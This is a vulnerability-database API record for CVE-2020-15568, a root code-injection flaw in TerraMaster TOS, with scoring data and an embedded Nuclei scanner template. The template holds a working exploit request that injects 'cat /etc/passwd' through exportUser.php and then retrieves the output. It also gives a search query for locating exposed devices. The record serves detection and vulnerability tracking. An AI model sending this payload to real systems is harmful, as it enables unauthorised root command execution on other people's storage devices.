{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2020-15568/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2020-15568/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2020-15568/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2020-15568/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2020-15568/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2020-15568"},"sightings":{"href":"/api/v1/sightings/cve-2020-15568"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.28984,"kev":false,"percentile":0.98078},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2020/CVE-2020-15568.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2020-15568\n\ninfo:\n  name: TerraMaster TOS <.1.29 - Remote Code Execution\n  author: pikpikcu\n  severity: critical\n  description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability.\n  reference:\n    - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-15568\n    - https://help.terra-master.com/TOS/view/\n    - https://github.com/divinepwner/TerraMaster-TOS-CVE-2020-15568\n    - https://github.com/n0bugz/CVE-2020-15568\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-15568\n    cwe-id: CWE-913\n    epss-score: 0.28984\n    epss-percentile: 0.98078\n    cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: terra-master\n    product: tos\n    fofa-query: '\"terramaster\" && header=\"tos\"'\n  tags: cve2020,cve,terramaster,rce,terra-master,vkev,vuln\nvariables:\n  filename: \"{{to_lower(rand_text_alpha(4))}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n      - |\n        GET /include/{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402200238fa6f446e5dbbc91a1112813b16042441f9ed976ea425f56793bb94d68fdb02206d61e01cbd5359cf023bb1fbf4b1d3ec884ba9063950592503183327bf5c936a:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2020-15568"}